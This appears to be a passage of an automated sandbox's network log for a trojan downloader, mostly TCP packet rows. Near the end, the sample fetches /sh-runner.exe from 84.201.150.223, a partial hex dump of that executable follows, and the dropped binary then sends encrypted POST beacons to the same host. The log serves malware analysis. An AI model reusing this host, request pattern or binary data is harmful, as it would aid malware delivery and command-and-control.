                                                                    Sep 28, 2024 17:52:35.304656029 CEST84434974284.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:35.304670095 CEST84434974284.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:35.304683924 CEST497428443192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:35.304685116 CEST84434974284.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:35.304688931 CEST497428443192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:35.304702044 CEST84434974284.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:35.304708958 CEST497428443192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:35.304727077 CEST497428443192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:35.304749966 CEST497428443192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:35.305165052 CEST84434974284.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:35.305180073 CEST84434974284.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:35.305195093 CEST84434974284.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:35.305210114 CEST497428443192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:35.305211067 CEST84434974284.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:35.305221081 CEST497428443192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:35.305239916 CEST497428443192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:35.305260897 CEST497428443192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:35.305597067 CEST84434974284.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:35.305612087 CEST84434974284.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:35.305628061 CEST84434974284.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:35.305643082 CEST84434974284.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:35.305645943 CEST497428443192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:35.305653095 CEST497428443192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:35.305659056 CEST84434974284.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:35.305679083 CEST497428443192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:35.305702925 CEST497428443192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:35.306077957 CEST84434974284.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:35.306092978 CEST84434974284.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:35.306109905 CEST84434974284.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:35.306127071 CEST497428443192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:35.306129932 CEST84434974284.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:35.306135893 CEST497428443192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:35.306166887 CEST497428443192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:35.306256056 CEST497428443192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:35.306498051 CEST84434974284.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:35.306513071 CEST84434974284.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:35.306528091 CEST84434974284.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:35.306535959 CEST497428443192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:35.306543112 CEST84434974284.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:35.306560040 CEST84434974284.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:35.306566954 CEST497428443192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:35.306605101 CEST497428443192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:35.307029009 CEST84434974284.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:35.307044029 CEST84434974284.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:35.307058096 CEST84434974284.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:35.307073116 CEST84434974284.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:35.307075024 CEST497428443192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:35.307106972 CEST497428443192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:35.307380915 CEST84434974284.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:35.307405949 CEST84434974284.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:35.307426929 CEST497428443192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:35.307461023 CEST497428443192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:35.307599068 CEST84434974284.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:35.307614088 CEST84434974284.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:35.307630062 CEST84434974284.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:35.307636976 CEST497428443192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:35.307674885 CEST497428443192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:35.307852983 CEST84434974284.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:35.307868958 CEST84434974284.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:35.307897091 CEST497428443192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:35.307961941 CEST497428443192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:35.428746939 CEST84434974284.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:35.428781033 CEST84434974284.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:35.428828955 CEST497428443192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:35.428848982 CEST84434974284.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:35.428864956 CEST497428443192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:35.428904057 CEST497428443192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:35.429059029 CEST497428443192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:35.429085016 CEST497428443192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:35.433773994 CEST84434974284.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:35.434400082 CEST497428443192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:35.509993076 CEST49743443192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:35.510025024 CEST4434974384.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:35.510121107 CEST49743443192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:35.510493994 CEST49743443192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:35.510505915 CEST4434974384.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:36.249912977 CEST4434974384.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:36.250058889 CEST49743443192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:36.251362085 CEST49743443192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:36.251372099 CEST4434974384.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:36.251713037 CEST4434974384.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:36.253201008 CEST49743443192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:36.253273010 CEST49743443192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:36.253277063 CEST4434974384.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:51.655791044 CEST49733443192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:54.581387997 CEST49744443192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:54.581429005 CEST4434974484.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:54.581506968 CEST49744443192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:54.581722975 CEST49744443192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:54.581734896 CEST4434974484.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:55.453777075 CEST4434974484.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:55.454361916 CEST49744443192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:55.454370975 CEST4434974484.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:55.515883923 CEST49744443192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:55.515892982 CEST4434974484.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:55.515929937 CEST49744443192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:55.515933990 CEST4434974484.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:59.921530008 CEST49735443192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:53:02.382512093 CEST63065443192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:53:02.382572889 CEST4436306584.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:53:02.382646084 CEST63065443192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:53:02.382823944 CEST63065443192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:53:02.382842064 CEST4436306584.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:53:03.110539913 CEST4436306584.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:53:03.111093044 CEST63065443192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:53:03.111126900 CEST4436306584.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:53:03.189114094 CEST63065443192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:53:03.189145088 CEST4436306584.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:53:03.189163923 CEST63065443192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:53:03.189173937 CEST4436306584.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:53:07.499650955 CEST49743443192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:53:11.035227060 CEST63066443192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:53:11.035304070 CEST4436306684.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:53:11.035448074 CEST63066443192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:53:11.035686016 CEST63066443192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:53:11.035711050 CEST4436306684.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:53:11.753758907 CEST4436306684.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:53:11.754914999 CEST63066443192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:53:11.754939079 CEST4436306684.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:53:11.762557030 CEST63066443192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:53:11.762564898 CEST4436306684.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:53:11.762598991 CEST63066443192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:53:11.762608051 CEST4436306684.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:53:27.671536922 CEST49744443192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:53:31.316061974 CEST63067443192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:53:31.316093922 CEST4436306784.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:53:31.316184998 CEST63067443192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:53:31.316394091 CEST63067443192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:53:31.316405058 CEST4436306784.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:53:32.025840044 CEST4436306784.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:53:32.026472092 CEST63067443192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:53:32.026489019 CEST4436306784.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:53:32.027137995 CEST63067443192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:53:32.027142048 CEST4436306784.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:53:32.027158022 CEST63067443192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:53:32.027163029 CEST4436306784.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:53:35.906132936 CEST63065443192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:53:38.554174900 CEST63068443192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:53:38.554204941 CEST4436306884.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:53:38.554274082 CEST63068443192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:53:38.554461002 CEST63068443192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:53:38.554469109 CEST4436306884.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:53:39.619986057 CEST4436306884.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:53:39.651133060 CEST63068443192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:53:39.651150942 CEST4436306884.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:53:39.651815891 CEST63068443192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:53:39.651820898 CEST4436306884.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:53:39.651855946 CEST63068443192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:53:39.651859999 CEST4436306884.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:53:43.499722958 CEST63066443192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:53:46.206571102 CEST63069443192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:53:46.206624031 CEST4436306984.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:53:46.206692934 CEST63069443192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:53:46.206902981 CEST63069443192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:53:46.206916094 CEST4436306984.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:53:46.941028118 CEST4436306984.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:53:46.941728115 CEST63069443192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:53:46.941773891 CEST4436306984.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:53:46.942194939 CEST63069443192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:53:46.942208052 CEST4436306984.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:53:46.942224979 CEST63069443192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:53:46.942234039 CEST4436306984.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:54:03.656027079 CEST63067443192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:54:06.987692118 CEST63070443192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:54:06.987766027 CEST4436307084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:54:06.987838030 CEST63070443192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:54:06.988090038 CEST63070443192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:54:06.988121986 CEST4436307084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:54:07.798113108 CEST4436307084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:54:07.798706055 CEST63070443192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:54:07.798737049 CEST4436307084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:54:07.799187899 CEST63070443192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:54:07.799196005 CEST4436307084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:54:07.799211025 CEST63070443192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:54:07.799217939 CEST4436307084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:54:11.909471035 CEST63068443192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:54:15.048329115 CEST63071443192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:54:15.048357010 CEST4436307184.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:54:15.048425913 CEST63071443192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:54:15.048619032 CEST63071443192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:54:15.048629999 CEST4436307184.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:54:15.785108089 CEST4436307184.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:54:15.789175034 CEST63071443192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:54:15.789186001 CEST4436307184.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:54:15.789674997 CEST63071443192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:54:15.789679050 CEST4436307184.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:54:15.789690971 CEST63071443192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:54:15.789695024 CEST4436307184.201.150.223192.168.2.4
                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Sep 28, 2024 17:52:57.818856955 CEST5358532162.159.36.2192.168.2.4
                                                                    Sep 28, 2024 17:52:58.288197994 CEST53654381.1.1.1192.168.2.4
                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                    Sep 28, 2024 17:52:15.683020115 CEST1.1.1.1192.168.2.40x909No error (0)windowsupdatebg.s.llnwi.net41.63.96.128A (IP address)IN (0x0001)false
                                                                    • 84.201.150.223
                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    0192.168.2.44973084.201.150.223807128C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Sep 28, 2024 17:52:12.405299902 CEST102OUTGET /sh-runner.exe HTTP/1.1
                                                                    User-Agent: Downloader
                                                                    Host: 84.201.150.223
                                                                    Cache-Control: no-cache
                                                                    Sep 28, 2024 17:52:13.120754957 CEST208INHTTP/1.0 200 OK
                                                                    Server: SimpleHTTP/0.6 Python/3.11.2
                                                                    Date: Sat, 28 Sep 2024 15:52:13 GMT
                                                                    Content-type: application/x-msdos-program
                                                                    Content-Length: 1169665
                                                                    Last-Modified: Tue, 24 Sep 2024 10:48:25 GMT
                                                                    Sep 28, 2024 17:52:13.120980024 CEST1236INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73
                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEdf6&+2@`
                                                                    Sep 28, 2024 17:52:13.121207952 CEST224INData Raw: 84 00 00 00 0e 0f 86 7b ff ff ff 8b 90 f8 00 00 00 31 c9 85 d2 0f 95 c1 e9 69 ff ff ff 0f 1f 80 00 00 00 00 48 8b 0d 91 04 0c 00 e8 9c a1 09 00 31 c0 48 83 c4 28 c3 0f 1f 44 00 00 83 78 74 0e 0f 86 40 ff ff ff 44 8b 80 e8 00 00 00 31 c9 45 85 c0
                                                                    Data Ascii: {1iH1H(Dxt@D1E,fH8HeL.H.H..HDH.HD$ }H8ATUWVSH HOH-G1eH%0HpH9
                                                                    Sep 28, 2024 17:52:13.121223927 CEST1236INData Raw: 84 67 01 00 00 b9 e8 03 00 00 ff d5 48 89 f8 f0 48 0f b1 33 48 85 c0 75 e3 48 8b 35 1c 03 0c 00 31 ff 8b 06 83 f8 01 0f 84 56 01 00 00 8b 06 85 c0 0f 84 b5 01 00 00 c7 05 13 2e 0d 00 01 00 00 00 8b 06 83 f8 01 0f 84 4c 01 00 00 85 ff 0f 84 65 01
                                                                    Data Ascii: gHH3HuH51V.LeHAHHtE11HQGHHH-{HcHHL%-HFH1IHpHIHDIHH
                                                                    Sep 28, 2024 17:52:13.121243000 CEST1236INData Raw: bb 09 00 0f 11 80 20 02 00 00 0f 28 05 97 bb 09 00 0f 11 80 30 02 00 00 0f 28 05 99 bb 09 00 0f 11 80 40 02 00 00 0f 28 05 9b bb 09 00 0f 11 80 50 02 00 00 0f 28 05 9d bb 09 00 0f 11 80 60 02 00 00 0f 28 05 9f bb 09 00 0f 11 80 70 02 00 00 0f 28
                                                                    Data Ascii: (0(@(P(`(p((((((((((( (
                                                                    Sep 28, 2024 17:52:13.121267080 CEST1236INData Raw: 11 80 a0 07 00 00 0f 28 05 47 bc 09 00 0f 11 80 b0 07 00 00 0f 28 05 49 bc 09 00 0f 11 80 c0 07 00 00 0f 28 05 4b bc 09 00 0f 11 80 d0 07 00 00 0f 28 05 4d bc 09 00 0f 11 80 e0 07 00 00 0f 28 05 4f bc 09 00 0f 11 80 f0 07 00 00 0f 28 05 51 bc 09
                                                                    Data Ascii: (G(I(K(M(O(Q(S(U (W0(Y@([P(]`(_p(a(c(e(g
                                                                    Sep 28, 2024 17:52:13.121283054 CEST1236INData Raw: 01 48 89 51 18 44 0f b6 00 45 84 c0 78 0d 44 89 c2 66 b8 01 00 5d c3 31 c0 5d c3 44 89 c2 83 e2 1f 4c 8d 48 02 4c 89 49 18 44 0f b6 50 01 41 83 e2 3f 41 80 f8 df 76 40 4c 8d 48 03 4c 89 49 18 44 0f b6 48 02 41 c1 e2 06 41 83 e1 3f 45 09 d1 41 80
                                                                    Data Ascii: HQDExDf]1]DLHLIDPA?Av@LHLIDHAA?EAr`L@LA@A?DGDf]DvDAAfQ3ADvDAAfQ(fD]f
                                                                    Sep 28, 2024 17:52:13.121299982 CEST1236INData Raw: 33 48 ff c1 48 89 4d f8 48 8d 0d 45 da 09 00 48 89 4c 24 20 48 8d 15 c1 e8 09 00 4c 8d 4d f8 41 b8 04 00 00 00 48 89 c1 e8 6f 67 08 00 90 48 83 c4 30 5d c3 48 8d 15 76 e8 09 00 41 b8 04 00 00 00 48 89 c1 48 83 c4 30 5d e9 2e 60 08 00 66 66 66 66
                                                                    Data Ascii: 3HHMHEHL$ HLMAHogH0]HvAHH0].`fffff.UHIHHHP]nfUVH8Hl$0LHuAH_H4H8^]fff.UHHB4u u]C]a/]0f.UHI
                                                                    Sep 28, 2024 17:52:13.121325016 CEST1236INData Raw: 83 fa 01 75 29 48 8d 15 00 24 0a 00 41 b8 07 00 00 00 eb 0d 48 8d 15 e7 23 0a 00 41 b8 0a 00 00 00 48 89 c1 48 83 c4 30 5d e9 7a 5b 08 00 48 83 c1 08 48 89 4d f8 48 8d 0d 93 da 09 00 48 89 4c 24 20 48 8d 15 ca 23 0a 00 4c 8d 4d f8 41 b8 04 00 00
                                                                    Data Ascii: u)H$AH#AHH0]z[HHMHHL$ H#LMAHmbH0]fDUHH]+UVH8Hl$0LHuAH,[HdH8^]fff.UH0Hl$0HH1H;qHAHH0]ZHMH
                                                                    Sep 28, 2024 17:52:13.121342897 CEST776INData Raw: 3f 80 ca 80 88 55 07 41 b8 04 00 00 00 48 8b 0e 48 8d 55 04 e8 4b e6 02 00 48 89 c7 48 85 c0 74 16 48 8d 5e 08 48 83 7e 08 00 74 08 48 89 d9 e8 40 21 00 00 48 89 3b 48 85 ff 0f 95 c0 48 83 c4 28 5b 5f 5e 5d c3 48 89 3b 48 89 c1 e8 13 78 09 00 cc
                                                                    Data Ascii: ?UAHHUKHHtH^H~tH@!H;HH([_^]H;HxfUVWSH(Hl$ HEsUAsE?UA\s%E$?E?UA/E$?E$?E?
                                                                    Sep 28, 2024 17:52:13.134938955 CEST1236INData Raw: 80 88 45 05 89 d0 c1 e8 06 24 3f 0c 80 88 45 06 80 e2 3f 80 ca 80 88 55 07 be 04 00 00 00 48 8b 39 48 8b 07 48 8b 5f 10 48 29 d8 48 39 f0 72 25 48 8b 4f 08 48 01 d9 48 8d 55 04 49 89 f0 e8 49 78 09 00 48 01 f3 48 89 5f 10 31 c0 48 83 c4 38 5b 5f
                                                                    Data Ascii: E$?E?UH9HH_H)H9r%HOHHUIIxHH_1H8[_^]HD$ AHHIH_@UVWSH(Hl$ HEsUAsE?UA\s%E$?E?UA


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    0192.168.2.44973384.201.150.2234433096C:\ProgramData\sh-runner.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-09-28 15:52:18 UTC271OUTPOST / HTTP/1.1
                                                                    Cache-Control: no-cache
                                                                    Connection: Keep-Alive
                                                                    Pragma: no-cache
                                                                    Content-Type: */*
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36
                                                                    Content-Length: 243
                                                                    Host: 84.201.150.223
                                                                    2024-09-28 15:52:18 UTC243OUTData Raw: 00 00 00 ef de ad be ef 3c f2 86 5e 00 00 00 63 00 00 00 00 9c 78 0c 3e e0 d2 8e 0e 02 80 be 12 34 f2 ba 86 7c dc 8e 12 c8 06 f4 b0 78 80 fa 34 30 ec 9e b4 ea ca 98 0a 1a 42 90 98 14 12 44 00 4e 0e a2 8e 91 55 7b 2f 9c 23 c5 67 89 c8 23 72 1f 0e 24 ad 07 fe fd 41 17 fb 13 30 54 8d 7a b2 f6 1a 78 ad 11 d8 74 b3 d9 dd c2 ff aa c9 0a 6f b2 ad 33 c7 b9 86 3c 08 c6 a8 3e 5b 2a 44 2d 92 67 79 da ad 1b c2 61 8c ae df db cd 49 28 9c 32 8b 24 de b8 e2 ea a3 23 f2 a5 84 0b e6 09 9f c6 78 e7 48 b9 11 ff d1 7b 2f 6e 3f 5c 86 63 e7 88 3f 5b ad b8 9d 37 41 3a ec e2 66 42 df af 65 84 4b 83 ee 95 38 5b d1 b2 14 23 c5 b6 84 93 66 15 7a ce 3c db 24 67 c5 80 87 ec f4 ba 1c e5 62 62 94 7e 11 28 29 22 5b d7 7d 98 1c 64 43 20 37 62 13 da 20
                                                                    Data Ascii: <^cx>4|x40BDNU{/#g#r$A0Tzxto3<>[*D-gyaI(2$#xH{/n?\c?[7A:fBeK8[#fz<$gbb~()"[}dC 7b


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    1192.168.2.44973584.201.150.2234432196C:\ProgramData\sh-runner.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-09-28 15:52:28 UTC271OUTPOST / HTTP/1.1
                                                                    Cache-Control: no-cache
                                                                    Connection: Keep-Alive
                                                                    Pragma: no-cache
                                                                    Content-Type: */*
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36
                                                                    Content-Length: 243
                                                                    Host: 84.201.150.223
                                                                    2024-09-28 15:52:28 UTC243OUTData Raw: 00 00 00 ef de ad be ef 2c d8 bf fa 00 00 00 63 00 00 00 00 a8 1e b0 56 04 f4 40 d0 1e 46 dc f8 da 86 86 1c 44 d6 12 2a 58 2a 08 50 a6 74 42 b8 60 b6 46 62 24 a0 ba b0 c6 66 24 1e b0 a0 dc c0 06 d4 3c 06 5a c0 dd 32 8b 3f 5f 42 3c a3 98 27 d3 48 54 a4 e8 09 84 63 e3 fd cf 7f 3e 86 ec 8f 74 be 75 70 72 32 21 6e 43 71 bc dc 38 46 8b c9 e1 6e 6f 1a 9d 9c 1f 99 a7 bb 6a ba 66 b2 d2 3f f4 0d ae 6c a0 d3 8d 03 f4 9b 92 6b 43 ae 6d fe f2 17 c4 db 81 a1 cf c9 3a 9a 5d 1c 46 98 26 08 98 60 7e 9e c8 9d 16 5c b7 09 37 b2 e6 71 b8 23 f1 8c 9d 8f b4 e0 43 ff 24 5b c9 5f 11 dc ec cb 10 46 51 68 5b e3 76 f3 ff 75 1e f0 b9 77 02 47 77 d2 b7 02 91 35 70 cd 72 f4 ce 60 b7 08 fc a3 e5 66 b9 de e7 5a 0b 7d 66 64 ef c3 07 2f cf f4 a4 56 76
                                                                    Data Ascii: ,cV@FD*X*PtB`Fb$f$<Z2?_B<'HTc>tupr2!nCq8Fnojf?lkCm:]F&`~\7q#C$[_FQh[vuwGw5pr`fZ}fd/Vv


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    2192.168.2.44974384.201.150.2234435472C:\ProgramData\sh-runner.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-09-28 15:52:36 UTC271OUTPOST / HTTP/1.1
                                                                    Cache-Control: no-cache
                                                                    Connection: Keep-Alive
                                                                    Pragma: no-cache
                                                                    Content-Type: */*
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36
                                                                    Content-Length: 243
                                                                    Host: 84.201.150.223
